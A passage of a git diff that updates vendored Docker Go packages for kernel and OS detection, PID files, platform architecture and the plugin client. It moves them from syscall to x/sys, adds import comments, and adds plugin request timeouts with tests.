diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go
index 7738fc7411..94780ef610 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go
@@ -2,7 +2,7 @@
 
 // Package kernel provides helper function to get, parse and compare kernel
 // versions for different platforms.
-package kernel
+package kernel // import "github.com/docker/docker/pkg/parsers/kernel"
 
 import (
 	"errors"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go
index 71f205b285..6e599eebcc 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go
@@ -2,7 +2,7 @@
 
 // Package kernel provides helper function to get, parse and compare kernel
 // versions for different platforms.
-package kernel
+package kernel // import "github.com/docker/docker/pkg/parsers/kernel"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go
index 744d5e1f83..8a9aa31225 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go
@@ -1,13 +1,13 @@
-// +build linux freebsd solaris
+// +build linux freebsd openbsd
 
 // Package kernel provides helper function to get, parse and compare kernel
 // versions for different platforms.
-package kernel
+package kernel // import "github.com/docker/docker/pkg/parsers/kernel"
 
 import (
 	"bytes"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
 // GetKernelVersion gets the current kernel version.
@@ -17,18 +17,8 @@ func GetKernelVersion() (*VersionInfo, error) {
 		return nil, err
 	}
 
-	release := make([]byte, len(uts.Release))
-
-	i := 0
-	for _, c := range uts.Release {
-		release[i] = byte(c)
-		i++
-	}
-
 	// Remove the \x00 from the release for Atoi to parse correctly
-	release = release[:bytes.IndexByte(release, 0)]
-
-	return ParseRelease(string(release))
+	return ParseRelease(string(uts.Release[:bytes.IndexByte(uts.Release[:], 0)]))
 }
 
 // CheckKernelVersion checks if current kernel is newer than (or equal to)
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go
index dc8c0e307b..2f36490c53 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package kernel
+package kernel // import "github.com/docker/docker/pkg/parsers/kernel"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go
index 80fab8ff64..b7b15a1fd2 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go
@@ -1,11 +1,10 @@
-// +build windows
-
-package kernel
+package kernel // import "github.com/docker/docker/pkg/parsers/kernel"
 
 import (
 	"fmt"
-	"syscall"
-	"unsafe"
+
+	"golang.org/x/sys/windows"
+	"golang.org/x/sys/windows/registry"
 )
 
 // VersionInfo holds information about the kernel.
@@ -23,41 +22,24 @@ func (k *VersionInfo) String() string {
 // GetKernelVersion gets the current kernel version.
 func GetKernelVersion() (*VersionInfo, error) {
 
-	var (
-		h         syscall.Handle
-		dwVersion uint32
-		err       error
-	)
-
 	KVI := &VersionInfo{"Unknown", 0, 0, 0}
 
-	if err = syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE,
-		syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`),
-		0,
-		syscall.KEY_READ,
-		&h); err != nil {
+	k, err := registry.OpenKey(registry.LOCAL_MACHINE, `SOFTWARE\Microsoft\Windows NT\CurrentVersion`, registry.QUERY_VALUE)
+	if err != nil {
 		return KVI, err
 	}
-	defer syscall.RegCloseKey(h)
+	defer k.Close()
 
-	var buf [1 << 10]uint16
-	var typ uint32
-	n := uint32(len(buf) * 2) // api expects array of bytes, not uint16
-
-	if err = syscall.RegQueryValueEx(h,
-		syscall.StringToUTF16Ptr("BuildLabEx"),
-		nil,
-		&typ,
-		(*byte)(unsafe.Pointer(&buf[0])),
-		&n); err != nil {
+	blex, _, err := k.GetStringValue("BuildLabEx")
+	if err != nil {
 		return KVI, err
 	}
-
-	KVI.kvi = syscall.UTF16ToString(buf[:])
+	KVI.kvi = blex
 
 	// Important - docker.exe MUST be manifested for this API to return
 	// the correct information.
-	if dwVersion, err = syscall.GetVersion(); err != nil {
+	dwVersion, err := windows.GetVersion()
+	if err != nil {
 		return KVI, err
 	}
 
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go
index bb9b32641e..212ff4502b 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go
@@ -1,18 +1,16 @@
-package kernel
+package kernel // import "github.com/docker/docker/pkg/parsers/kernel"
 
-import (
-	"syscall"
-)
+import "golang.org/x/sys/unix"
 
 // Utsname represents the system name structure.
-// It is passthrough for syscall.Utsname in order to make it portable with
+// It is passthrough for unix.Utsname in order to make it portable with
 // other platforms where it is not available.
-type Utsname syscall.Utsname
+type Utsname unix.Utsname
 
-func uname() (*syscall.Utsname, error) {
-	uts := &syscall.Utsname{}
+func uname() (*unix.Utsname, error) {
+	uts := &unix.Utsname{}
 
-	if err := syscall.Uname(uts); err != nil {
+	if err := unix.Uname(uts); err != nil {
 		return nil, err
 	}
 	return uts, nil
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go
index 49370bd3dd..b2139b60e8 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go
@@ -1,4 +1,4 @@
-package kernel
+package kernel // import "github.com/docker/docker/pkg/parsers/kernel"
 
 import (
 	"golang.org/x/sys/unix"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go
index 1da3f239fa..97906e4cd7 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go
@@ -1,6 +1,6 @@
-// +build !linux,!solaris
+// +build !linux
 
-package kernel
+package kernel // import "github.com/docker/docker/pkg/parsers/kernel"
 
 import (
 	"errors"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go
index e04a3499af..b251d6aed6 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go
@@ -1,6 +1,6 @@
 // Package operatingsystem provides helper function to get the operating system
 // name for different platforms.
-package operatingsystem
+package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem"
 
 import (
 	"bufio"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go
deleted file mode 100644
index d08ad14860..0000000000
--- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go
+++ /dev/null
@@ -1,37 +0,0 @@
-// +build solaris,cgo
-
-package operatingsystem
-
-/*
-#include <zone.h>
-*/
-import "C"
-
-import (
-	"bytes"
-	"errors"
-	"io/ioutil"
-)
-
-var etcOsRelease = "/etc/release"
-
-// GetOperatingSystem gets the name of the current operating system.
-func GetOperatingSystem() (string, error) {
-	b, err := ioutil.ReadFile(etcOsRelease)
-	if err != nil {
-		return "", err
-	}
-	if i := bytes.Index(b, []byte("\n")); i >= 0 {
-		b = bytes.Trim(b[:i], " ")
-		return string(b), nil
-	}
-	return "", errors.New("release not found")
-}
-
-// IsContainerized returns true if we are running inside a container.
-func IsContainerized() (bool, error) {
-	if C.getzoneid() != 0 {
-		return true, nil
-	}
-	return false, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go
index bc91c3c533..f4792d37d5 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go
@@ -1,6 +1,6 @@
 // +build freebsd darwin
 
-package operatingsystem
+package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem"
 
 import (
 	"errors"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go
index e7120c65c4..d10ed4cdcd 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go
@@ -1,6 +1,6 @@
 // +build linux freebsd
 
-package operatingsystem
+package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go
index 3c86b6af9c..372de51469 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go
@@ -1,43 +1,45 @@
-package operatingsystem
+package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem"
 
 import (
-	"syscall"
-	"unsafe"
-)
+	"fmt"
 
-// See https://code.google.com/p/go/source/browse/src/pkg/mime/type_windows.go?r=d14520ac25bf6940785aabb71f5be453a286f58c
-// for a similar sample
+	"golang.org/x/sys/windows/registry"
+)
 
 // GetOperatingSystem gets the name of the current operating system.
 func GetOperatingSystem() (string, error) {
 
-	var h syscall.Handle
-
 	// Default return value
 	ret := "Unknown Operating System"
 
-	if err := syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE,
-		syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`),
-		0,
-		syscall.KEY_READ,
-		&h); err != nil {
+	k, err := registry.OpenKey(registry.LOCAL_MACHINE, `SOFTWARE\Microsoft\Windows NT\CurrentVersion`, registry.QUERY_VALUE)
+	if err != nil {
 		return ret, err
 	}
-	defer syscall.RegCloseKey(h)
-
-	var buf [1 << 10]uint16
-	var typ uint32
-	n := uint32(len(buf) * 2) // api expects array of bytes, not uint16
-
-	if err := syscall.RegQueryValueEx(h,
-		syscall.StringToUTF16Ptr("ProductName"),
-		nil,
-		&typ,
-		(*byte)(unsafe.Pointer(&buf[0])),
-		&n); err != nil {
+	defer k.Close()
+
+	pn, _, err := k.GetStringValue("ProductName")
+	if err != nil {
+		return ret, err
+	}
+	ret = pn
+
+	ri, _, err := k.GetStringValue("ReleaseId")
+	if err != nil {
+		return ret, err
+	}
+	ret = fmt.Sprintf("%s Version %s", ret, ri)
+
+	cbn, _, err := k.GetStringValue("CurrentBuildNumber")
+	if err != nil {
+		return ret, err
+	}
+
+	ubr, _, err := k.GetIntegerValue("UBR")
+	if err != nil {
 		return ret, err
 	}
-	ret = syscall.UTF16ToString(buf[:])
+	ret = fmt.Sprintf("%s (OS Build %s.%d)", ret, cbn, ubr)
 
 	return ret, nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers.go b/vendor/github.com/docker/docker/pkg/parsers/parsers.go
index acc897168f..c4186a4c0a 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/parsers.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/parsers.go
@@ -1,7 +1,7 @@
 // Package parsers provides helper functions to parse and validate different type
 // of string. It can be hosts, unix addresses, tcp addresses, filters, kernel
 // operating system versions.
-package parsers
+package parsers // import "github.com/docker/docker/pkg/parsers"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go
index 7f19e90279..a70093f1c4 100644
--- a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go
+++ b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go
@@ -1,4 +1,4 @@
-package parsers
+package parsers // import "github.com/docker/docker/pkg/parsers"
 
 import (
 	"reflect"
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go
index d832fea7a2..0617a89e5f 100644
--- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go
@@ -1,7 +1,7 @@
 // Package pidfile provides structure and helper functions to create and remove
 // PID file. A PID file is usually a file used to store the process ID of a
 // running process.
-package pidfile
+package pidfile // import "github.com/docker/docker/pkg/pidfile"
 
 import (
 	"fmt"
@@ -37,7 +37,7 @@ func New(path string) (*PIDFile, error) {
 		return nil, err
 	}
 	// Note MkdirAll returns nil if a directory already exists
-	if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755)); err != nil {
+	if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755), ""); err != nil {
 		return nil, err
 	}
 	if err := ioutil.WriteFile(path, []byte(fmt.Sprintf("%d", os.Getpid())), 0644); err != nil {
@@ -49,8 +49,5 @@ func New(path string) (*PIDFile, error) {
 
 // Remove removes the PIDFile.
 func (file PIDFile) Remove() error {
-	if err := os.Remove(file.path); err != nil {
-		return err
-	}
-	return nil
+	return os.Remove(file.path)
 }
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go
index 5c1cd7ab85..92746aa7bf 100644
--- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go
@@ -1,18 +1,14 @@
 // +build darwin
 
-package pidfile
+package pidfile // import "github.com/docker/docker/pkg/pidfile"
 
 import (
-	"syscall"
+	"golang.org/x/sys/unix"
 )
 
 func processExists(pid int) bool {
 	// OS X does not have a proc filesystem.
 	// Use kill -0 pid to judge if the process exists.
-	err := syscall.Kill(pid, 0)
-	if err != nil {
-		return false
-	}
-
-	return true
+	err := unix.Kill(pid, 0)
+	return err == nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go
index 73e8af76db..cd9878e1e4 100644
--- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go
@@ -1,4 +1,4 @@
-package pidfile
+package pidfile // import "github.com/docker/docker/pkg/pidfile"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go
index 1bf5221e3b..cc6696d211 100644
--- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go
@@ -1,6 +1,6 @@
 // +build !windows,!darwin
 
-package pidfile
+package pidfile // import "github.com/docker/docker/pkg/pidfile"
 
 import (
 	"os"
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go
index ae489c627a..1c5e6cb654 100644
--- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go
@@ -1,6 +1,8 @@
-package pidfile
+package pidfile // import "github.com/docker/docker/pkg/pidfile"
 
-import "syscall"
+import (
+	"golang.org/x/sys/windows"
+)
 
 const (
 	processQueryLimitedInformation = 0x1000
@@ -9,13 +11,13 @@ const (
 )
 
 func processExists(pid int) bool {
-	h, err := syscall.OpenProcess(processQueryLimitedInformation, false, uint32(pid))
+	h, err := windows.OpenProcess(processQueryLimitedInformation, false, uint32(pid))
 	if err != nil {
 		return false
 	}
 	var c uint32
-	err = syscall.GetExitCodeProcess(h, &c)
-	syscall.Close(h)
+	err = windows.GetExitCodeProcess(h, &c)
+	windows.Close(h)
 	if err != nil {
 		return c == stillActive
 	}
diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go
index 2cdc2c5918..a260a23f4f 100644
--- a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go
+++ b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go
@@ -1,16 +1,18 @@
 // Package platform provides helper function to get the runtime architecture
 // for different platforms.
-package platform
+package platform // import "github.com/docker/docker/pkg/platform"
 
 import (
-	"syscall"
+	"bytes"
+
+	"golang.org/x/sys/unix"
 )
 
 // runtimeArchitecture gets the name of the current architecture (x86, x86_64, …)
 func runtimeArchitecture() (string, error) {
-	utsname := &syscall.Utsname{}
-	if err := syscall.Uname(utsname); err != nil {
+	utsname := &unix.Utsname{}
+	if err := unix.Uname(utsname); err != nil {
 		return "", err
 	}
-	return charsToString(utsname.Machine), nil
+	return string(utsname.Machine[:bytes.IndexByte(utsname.Machine[:], 0)]), nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go
index 45bbcf1535..d51f68698f 100644
--- a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go
+++ b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go
@@ -1,8 +1,8 @@
-// +build freebsd solaris darwin
+// +build freebsd darwin
 
 // Package platform provides helper function to get the runtime architecture
 // for different platforms.
-package platform
+package platform // import "github.com/docker/docker/pkg/platform"
 
 import (
 	"os/exec"
diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go
index c5f684ddfa..a25f1bc516 100644
--- a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go
+++ b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go
@@ -1,4 +1,4 @@
-package platform
+package platform // import "github.com/docker/docker/pkg/platform"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/platform/platform.go b/vendor/github.com/docker/docker/pkg/platform/platform.go
index e4b03122f4..f6b02b734a 100644
--- a/vendor/github.com/docker/docker/pkg/platform/platform.go
+++ b/vendor/github.com/docker/docker/pkg/platform/platform.go
@@ -1,9 +1,9 @@
-package platform
+package platform // import "github.com/docker/docker/pkg/platform"
 
 import (
 	"runtime"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
 var (
diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go
deleted file mode 100644
index 5dcbadfdfe..0000000000
--- a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go
+++ /dev/null
@@ -1,18 +0,0 @@
-// +build linux,386 linux,amd64 linux,arm64
-// see golang's sources src/syscall/ztypes_linux_*.go that use int8
-
-package platform
-
-// Convert the OS/ARCH-specific utsname.Machine to string
-// given as an array of signed int8
-func charsToString(ca [65]int8) string {
-	s := make([]byte, len(ca))
-	var lens int
-	for ; lens < len(ca); lens++ {
-		if ca[lens] == 0 {
-			break
-		}
-		s[lens] = uint8(ca[lens])
-	}
-	return string(s[0:lens])
-}
diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go
deleted file mode 100644
index c9875cf6e6..0000000000
--- a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go
+++ /dev/null
@@ -1,18 +0,0 @@
-// +build linux,arm linux,ppc64 linux,ppc64le s390x
-// see golang's sources src/syscall/ztypes_linux_*.go that use uint8
-
-package platform
-
-// Convert the OS/ARCH-specific utsname.Machine to string
-// given as an array of unsigned uint8
-func charsToString(ca [65]uint8) string {
-	s := make([]byte, len(ca))
-	var lens int
-	for ; lens < len(ca); lens++ {
-		if ca[lens] == 0 {
-			break
-		}
-		s[lens] = ca[lens]
-	}
-	return string(s[0:lens])
-}
diff --git a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go
index dde5f66035..370e0d5b97 100644
--- a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go
+++ b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go
@@ -1,22 +1,39 @@
-package plugingetter
+package plugingetter // import "github.com/docker/docker/pkg/plugingetter"
 
-import "github.com/docker/docker/pkg/plugins"
+import (
+	"net"
+	"time"
+
+	"github.com/docker/docker/pkg/plugins"
+)
 
 const (
-	// LOOKUP doesn't update RefCount
-	LOOKUP = 0
-	// ACQUIRE increments RefCount
-	ACQUIRE = 1
-	// RELEASE decrements RefCount
-	RELEASE = -1
+	// Lookup doesn't update RefCount
+	Lookup = 0
+	// Acquire increments RefCount
+	Acquire = 1
+	// Release decrements RefCount
+	Release = -1
 )
 
-// CompatPlugin is a abstraction to handle both v2(new) and v1(legacy) plugins.
+// CompatPlugin is an abstraction to handle both v2(new) and v1(legacy) plugins.
 type CompatPlugin interface {
-	Client() *plugins.Client
 	Name() string
-	BasePath() string
+	ScopedPath(string) string
 	IsV1() bool
+	PluginWithV1Client
+}
+
+// PluginWithV1Client is a plugin that directly utilizes the v1/http plugin client
+type PluginWithV1Client interface {
+	Client() *plugins.Client
+}
+
+// PluginAddr is a plugin that exposes the socket address for creating custom clients rather than the built-in `*plugins.Client`
+type PluginAddr interface {
+	Addr() net.Addr
+	Timeout() time.Duration
+	Protocol() string
 }
 
 // CountedPlugin is a plugin which is reference counted.
diff --git a/vendor/github.com/docker/docker/pkg/plugins/client.go b/vendor/github.com/docker/docker/pkg/plugins/client.go
index e8e730eb58..0353305358 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/client.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/client.go
@@ -1,7 +1,8 @@
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io"
 	"io/ioutil"
@@ -9,10 +10,11 @@ import (
 	"net/url"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/plugins/transport"
 	"github.com/docker/go-connections/sockets"
 	"github.com/docker/go-connections/tlsconfig"
+	"github.com/sirupsen/logrus"
 )
 
 const (
@@ -57,20 +59,20 @@ func NewClient(addr string, tlsConfig *tlsconfig.Options) (*Client, error) {
 }
 
 // NewClientWithTimeout creates a new plugin client (http).
-func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeoutInSecs int) (*Client, error) {
+func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeout time.Duration) (*Client, error) {
 	clientTransport, err := newTransport(addr, tlsConfig)
 	if err != nil {
 		return nil, err
 	}
-	return newClientWithTransport(clientTransport, timeoutInSecs), nil
+	return newClientWithTransport(clientTransport, timeout), nil
 }
 
 // newClientWithTransport creates a new plugin client with a given transport.
-func newClientWithTransport(tr transport.Transport, timeoutInSecs int) *Client {
+func newClientWithTransport(tr transport.Transport, timeout time.Duration) *Client {
 	return &Client{
 		http: &http.Client{
 			Transport: tr,
-			Timeout:   time.Duration(timeoutInSecs) * time.Second,
+			Timeout:   timeout,
 		},
 		requestFactory: tr,
 	}
@@ -82,16 +84,33 @@ type Client struct {
 	requestFactory transport.RequestFactory
 }
 
+// RequestOpts is the set of options that can be passed into a request
+type RequestOpts struct {
+	Timeout time.Duration
+}
+
+// WithRequestTimeout sets a timeout duration for plugin requests
+func WithRequestTimeout(t time.Duration) func(*RequestOpts) {
+	return func(o *RequestOpts) {
+		o.Timeout = t
+	}
+}
+
 // Call calls the specified method with the specified arguments for the plugin.
 // It will retry for 30 seconds if a failure occurs when calling.
-func (c *Client) Call(serviceMethod string, args interface{}, ret interface{}) error {
+func (c *Client) Call(serviceMethod string, args, ret interface{}) error {
+	return c.CallWithOptions(serviceMethod, args, ret)
+}
+
+// CallWithOptions is just like call except it takes options
+func (c *Client) CallWithOptions(serviceMethod string, args interface{}, ret interface{}, opts ...func(*RequestOpts)) error {
 	var buf bytes.Buffer
 	if args != nil {
 		if err := json.NewEncoder(&buf).Encode(args); err != nil {
 			return err
 		}
 	}
-	body, err := c.callWithRetry(serviceMethod, &buf, true)
+	body, err := c.callWithRetry(serviceMethod, &buf, true, opts...)
 	if err != nil {
 		return err
 	}
@@ -128,18 +147,31 @@ func (c *Client) SendFile(serviceMethod string, data io.Reader, ret interface{})
 	return nil
 }
 
-func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) (io.ReadCloser, error) {
-	req, err := c.requestFactory.NewRequest(serviceMethod, data)
-	if err != nil {
-		return nil, err
-	}
-
+func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool, reqOpts ...func(*RequestOpts)) (io.ReadCloser, error) {
 	var retries int
 	start := time.Now()
 
+	var opts RequestOpts
+	for _, o := range reqOpts {
+		o(&opts)
+	}
+
 	for {
+		req, err := c.requestFactory.NewRequest(serviceMethod, data)
+		if err != nil {
+			return nil, err
+		}
+
+		cancelRequest := func() {}
+		if opts.Timeout > 0 {
+			var ctx context.Context
+			ctx, cancelRequest = context.WithTimeout(req.Context(), opts.Timeout)
+			req = req.WithContext(ctx)
+		}
+
 		resp, err := c.http.Do(req)
 		if err != nil {
+			cancelRequest()
 			if !retry {
 				return nil, err
 			}
@@ -157,6 +189,7 @@ func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool)
 		if resp.StatusCode != http.StatusOK {
 			b, err := ioutil.ReadAll(resp.Body)
 			resp.Body.Close()
+			cancelRequest()
 			if err != nil {
 				return nil, &statusError{resp.StatusCode, serviceMethod, err.Error()}
 			}
@@ -176,7 +209,11 @@ func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool)
 			// old way...
 			return nil, &statusError{resp.StatusCode, serviceMethod, string(b)}
 		}
-		return resp.Body, nil
+		return ioutils.NewReadCloserWrapper(resp.Body, func() error {
+			err := resp.Body.Close()
+			cancelRequest()
+			return err
+		}), nil
 	}
 }
 
diff --git a/vendor/github.com/docker/docker/pkg/plugins/client_test.go b/vendor/github.com/docker/docker/pkg/plugins/client_test.go
index 9faad86a15..c3a4892272 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/client_test.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/client_test.go
@@ -1,16 +1,22 @@
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
+	"bytes"
+	"context"
+	"encoding/json"
 	"io"
 	"net/http"
 	"net/http/httptest"
 	"net/url"
-	"reflect"
+	"strings"
 	"testing"
 	"time"
 
 	"github.com/docker/docker/pkg/plugins/transport"
 	"github.com/docker/go-connections/tlsconfig"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 var (
@@ -38,6 +44,26 @@ func TestFailedConnection(t *testing.T) {
 	}
 }
 
+func TestFailOnce(t *testing.T) {
+	addr := setupRemotePluginServer()
+	defer teardownRemotePluginServer()
+
+	failed := false
+	mux.HandleFunc("/Test.FailOnce", func(w http.ResponseWriter, r *http.Request) {
+		if !failed {
+			failed = true
+			panic("Plugin not ready")
+		}
+	})
+
+	c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true})
+	b := strings.NewReader("body")
+	_, err := c.callWithRetry("Test.FailOnce", b, true)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
 func TestEchoInputOutput(t *testing.T) {
 	addr := setupRemotePluginServer()
 	defer teardownRemotePluginServer()
@@ -62,9 +88,7 @@ func TestEchoInputOutput(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	if !reflect.DeepEqual(output, m) {
-		t.Fatalf("Expected %v, was %v\n", m, output)
-	}
+	assert.Check(t, is.DeepEqual(m, output))
 	err = c.Call("Test.Echo", nil, nil)
 	if err != nil {
 		t.Fatal(err)
@@ -132,3 +156,122 @@ func TestClientScheme(t *testing.T) {
 		}
 	}
 }
+
+func TestNewClientWithTimeout(t *testing.T) {
+	addr := setupRemotePluginServer()
+	defer teardownRemotePluginServer()
+
+	m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}}
+
+	mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) {
+		time.Sleep(time.Duration(600) * time.Millisecond)
+		io.Copy(w, r.Body)
+	})
+
+	// setting timeout of 500ms
+	timeout := time.Duration(500) * time.Millisecond
